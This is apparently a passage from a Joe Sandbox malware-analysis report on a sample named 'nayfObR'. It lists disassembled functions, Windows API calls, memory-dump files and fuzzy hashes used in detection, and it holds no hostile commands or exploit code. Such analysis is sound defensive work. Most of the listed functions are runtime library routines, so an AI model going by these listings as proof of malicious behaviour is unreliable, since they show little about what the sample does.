Instruction ID: 69021041042c5d11eeba3ea69a0b02e17cc9aa15ef3173dd98195521689d4bce
Opcode Fuzzy Hash: a8df40b49336e4fffccab0ed2b9c025363f1dc2c649d391d1ba9bacf93bfb11f
Instruction Fuzzy Hash: 7B418F35A0051AAFCB14DFA8C4909FDBBF9FF1A310B64006AE542E7640EB31F945DB90

Function 005B600D Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0527b141233e862ec0402c1b20fe1a2eb55d3df8a2f9f9970eed5fdf12bbc374
Instruction ID: 3db30ae6db8d7bd7996d639743478f74863bcb55b329c7138b50b35897832374
Opcode Fuzzy Hash: 0527b141233e862ec0402c1b20fe1a2eb55d3df8a2f9f9970eed5fdf12bbc374
Instruction Fuzzy Hash: 3B0128332012195F9B22DF69EC89AAA3B75FBD1770B244126F514CB094DA35FC04ABD4

Function 005B62F4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,005B548F,00000001,00000364,00000002,000000FF,00000000,?,?,005AD225,00000000,?), ref: 005B6335

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2db94771e390a2e47d9dc4f2231be7e413520880d8dddc8b448cff87e8ccfc14
Instruction ID: f5d7e7aa216eb9ea022709ce2f2a621047efe5c7033732139ff92a1dea1a9ebb
Opcode Fuzzy Hash: 2db94771e390a2e47d9dc4f2231be7e413520880d8dddc8b448cff87e8ccfc14
Instruction Fuzzy Hash: 6DF08931602A25A6DF615E769C0ABEF7FD8BF81760B154922E805DB190DE34FC0486F1

Function 005B4FF1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,005B6F75,?,?,005B6F75,00000220,?,?,?), ref: 005B5023

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7ed53b7654fa39f173f129311025a15643251de7fedec5965fef9f75e3ff8f7f
Instruction ID: 7d25c45562fb03a7cfb2697339b549b8c6ede210fcbe6296cae776edabec9af6
Opcode Fuzzy Hash: 7ed53b7654fa39f173f129311025a15643251de7fedec5965fef9f75e3ff8f7f
Instruction Fuzzy Hash: 92E06571102D5D56DB357A659C0DBDB3F48BF457E0F550121FC4596191FA21FC0191F1

Non-executed Functions

Function 005C00A2 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 005C02B9

Strings

1#QNAN, xrefs: 005C01B5
1#IND, xrefs: 005C01A7
1#INF, xrefs: 005C01D8
1#SNAN, xrefs: 005C01AE

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a2c74c49f6e646b7e33989545ee99dcf07236889071ca223c55fd9bacff1e005
Instruction ID: 592f26d15a9c3c43325d02bc745970cb096a38a41986c80860fabb069eb8ac15
Opcode Fuzzy Hash: a2c74c49f6e646b7e33989545ee99dcf07236889071ca223c55fd9bacff1e005
Instruction Fuzzy Hash: 42D22871E086298FDB64CE68CC44BEABBB5FB85304F1455EAD40DE7281D778AE858F40

Function 005BAAB7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,005BA46D,00000002,00000000,?,?,?,005BA46D,?,00000000), ref: 005BAB50
GetLocaleInfoW.KERNEL32(?,20001004,005BA46D,00000002,00000000,?,?,?,005BA46D,?,00000000), ref: 005BAB79
GetACP.KERNEL32(?,?,005BA46D,?,00000000), ref: 005BAB8E

Strings

OCP, xrefs: 005BAB0B
ACP, xrefs: 005BAAD5

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: aa2ac833f680c09adf501772e26aae2a46af28549ee7cb84a15a1ac8c3160d8b
Instruction ID: ee5bc9b5793389c87f328e23b0c58e38729c9eff9595411c704fafff447925a4
Opcode Fuzzy Hash: aa2ac833f680c09adf501772e26aae2a46af28549ee7cb84a15a1ac8c3160d8b
Instruction Fuzzy Hash: 0C219532700101AADB358F54C901FE7BFA7FB94B64B568424E91AD7114E732FD40D352

Function 005BA337 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 005BA43F
IsValidCodePage.KERNEL32(00000000), ref: 005BA47D
IsValidLocale.KERNEL32(?,00000001), ref: 005BA490
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 005BA4D8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 005BA4F3

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: c0645427ab4c62cc2af61a106ae7d0bffc7dbcd8ca5739d853361500e23d81a4
Instruction ID: fdd6c574531e130ec197f1c4324c15700892c524a1ce211c2119b904be8f0e71
Opcode Fuzzy Hash: c0645427ab4c62cc2af61a106ae7d0bffc7dbcd8ca5739d853361500e23d81a4
Instruction Fuzzy Hash: 27515271A00616AFDF20DFA4DC45AFE7BB8FF58700F144469E501E7191EBB0AA048B62

Function 005B3010 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d6a4fa0bf6480ef2fa740f4acb7545683e09ee9f7b1cd6b517977084591d94b
Instruction ID: 1997daad22c9e3f024ac0073a7594d67f91077882dc2f654748a702fc2ff079f
Opcode Fuzzy Hash: 0d6a4fa0bf6480ef2fa740f4acb7545683e09ee9f7b1cd6b517977084591d94b
Instruction Fuzzy Hash: 04021871E012199BDF14CFA9C884AEEFBB5FF88314F248269D915B7341D731AA45CB90

Function 005BB099 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BB189

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7bb8c8f39e1b0c3941c42dbf9a66d6feaac72412319f80b4a5046504685c01be
Instruction ID: 7b79062b68bacc8d6f0b651ee33cfa5ef6ee86a10b39258ee07055cfe7c1aa50
Opcode Fuzzy Hash: 7bb8c8f39e1b0c3941c42dbf9a66d6feaac72412319f80b4a5046504685c01be
Instruction Fuzzy Hash: 6E71E3758051695FEF20AF288C9EAFEBFB9FB45300F1441D9E449A7211EBB16E849F10

Function 005A9643 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 005A964F
IsDebuggerPresent.KERNEL32 ref: 005A971B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005A9734
UnhandledExceptionFilter.KERNEL32(?), ref: 005A973E

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5d665b14275aefa3eb3235df4960bcb4af208f3022dbeb5df6eb46c5b65a74c2
Instruction ID: 1f1990b5367ad64388dcf246eaa1f4c04902bb9f3509f6299edb6ea721a64b30
Opcode Fuzzy Hash: 5d665b14275aefa3eb3235df4960bcb4af208f3022dbeb5df6eb46c5b65a74c2
Instruction Fuzzy Hash: 25312775D052299BDF21DFA4D84ABCDBBB8BF08300F1041AAE50DAB250EB719A84DF45

Function 005A9F05 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 005A9F17
GetCurrentThreadId.KERNEL32 ref: 005A9F26
GetCurrentProcessId.KERNEL32 ref: 005A9F2F
QueryPerformanceCounter.KERNEL32(?), ref: 005A9F3C

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 5c7a6226f3c2829beb82ec946c66b75dd9cbd8f61564378e6bca46bf5522e352
Instruction ID: 421feba742ec3e10c016db67268d4a443f4449d3f6b26fcd6aaedc5025b97baa
Opcode Fuzzy Hash: 5c7a6226f3c2829beb82ec946c66b75dd9cbd8f61564378e6bca46bf5522e352
Instruction Fuzzy Hash: 61F06274D1160DEFCF40DBB4DA4999EBBF4EF2C200B918596A412E7110E734AB489B51

Function 005BA630 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA684
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA6CE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA794

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 37028b40e4462c3cc4cb9bf12f82ecffde33051323db8a813a86ca099eae28f6
Instruction ID: ac572372e18d4e66f1d165d0ed52eb7575072e5cd02d66b460a58cdef536604f
Opcode Fuzzy Hash: 37028b40e4462c3cc4cb9bf12f82ecffde33051323db8a813a86ca099eae28f6
Instruction Fuzzy Hash: 62619C719046079FEB299F28CD86BFA7BB8FF44310F1040AAE905C6585EB34E981DB52

Function 005B1630 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005B1728
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005B1732
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 005B173F

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7d28b3782061d69d9a3f945d3ab5e513c1109b95a2cf378964c9bcaab62e4ee0
Instruction ID: b002d218cdddb8f4ed9383ed29552b4418d9260c620b4eb2e71b474c7d95d73f
Opcode Fuzzy Hash: 7d28b3782061d69d9a3f945d3ab5e513c1109b95a2cf378964c9bcaab62e4ee0
Instruction Fuzzy Hash: DE31B27490122D9BCB61DF68D889BCDBBB8FF58310F5041EAE40CA7251EB709B858F44

Function 005BE38E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005BE2E9,?,?,00000008,?,?,005C504B,00000000), ref: 005BE5BB

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0218aca8bcd88fb11047a1c036d4d8b7032e3bfaebd0fcb7051211dbbd85bcbd
Instruction ID: d4cc7ff5c87a3248b70e5cc9cdf6420305dbe398bc5b0798aaecb7b8ee28d91f
Opcode Fuzzy Hash: 0218aca8bcd88fb11047a1c036d4d8b7032e3bfaebd0fcb7051211dbbd85bcbd
Instruction Fuzzy Hash: 55B11B316106099FDB19CF28C48ABE97FE0FF45364F298658E899CF2A1C735E991CB40

Function 005A92AB Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005A92C1

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ba9503f0be960ad21199b2a1427fc8ae866069807002ae84601013aa500c2a0f
Instruction ID: 9ad46c93089268e691024eae6065d3d5653be89640278d8ec3408127d45d1b24
Opcode Fuzzy Hash: ba9503f0be960ad21199b2a1427fc8ae866069807002ae84601013aa500c2a0f
Instruction Fuzzy Hash: 38A168B1D026198FDB29CF54D8826AEBBF0FF58314F24952BD415EB2A0C3749944EFA1

Function 005BAFE8 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005B62F4: RtlAllocateHeap.NTDLL(00000008,?,?,?,005B548F,00000001,00000364,00000002,000000FF,00000000,?,?,005AD225,00000000,?), ref: 005B6335

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BB189
FindNextFileW.KERNEL32(00000000,?), ref: 005BB27D
FindClose.KERNEL32(00000000), ref: 005BB2BC
FindClose.KERNEL32(00000000), ref: 005BB2EF

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Find$CloseFile$AllocateFirstHeapNext
String ID:
API String ID: 4087847297-0
Opcode ID: 56db28292a60bcc0db3861d63e125941d24e50098e407f94e21db38d5270d3eb
Instruction ID: a0b1cd71ffbca98766e7df19103c7500933c4e824810ca5c4142155ee7bbeba8
Opcode Fuzzy Hash: 56db28292a60bcc0db3861d63e125941d24e50098e407f94e21db38d5270d3eb
Instruction Fuzzy Hash: BB51687590010DAFEF24AF289C99AFFBFA9FF85304F144199F41897241EBB0AD419B60

Function 005BA8F0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA944

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 9e108bf9db9559682a101e4e6d59c8ed9f6a1a88b850e6a3bd80bd734909be15
Instruction ID: eeaf9204941d0608eb73205a6383b759944eac7d167b1c6735541857655b8303
Opcode Fuzzy Hash: 9e108bf9db9559682a101e4e6d59c8ed9f6a1a88b850e6a3bd80bd734909be15
Instruction Fuzzy Hash: AF219F32611207ABDF299B29DC46BFA7BA8FF84310F11407AF906D6145EB34FD04AB52

Function 005AD9B2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 005ADB36

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 70ead00358a006a796398846ab6da5ab8affbb6ddd92ccf278456ca45d0f5e87
Instruction ID: 16913ecb7da3bbf4f30fd07515eca9902f2c102288fbb1cdc206d52b33c044e5
Opcode Fuzzy Hash: 70ead00358a006a796398846ab6da5ab8affbb6ddd92ccf278456ca45d0f5e87
Instruction Fuzzy Hash: 37B1CF7090860A8BCB24FE68C5696BEBFB1BF47310F144A1DD49397E91DA74AE01CB70

Function 005BAA10 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BAA64

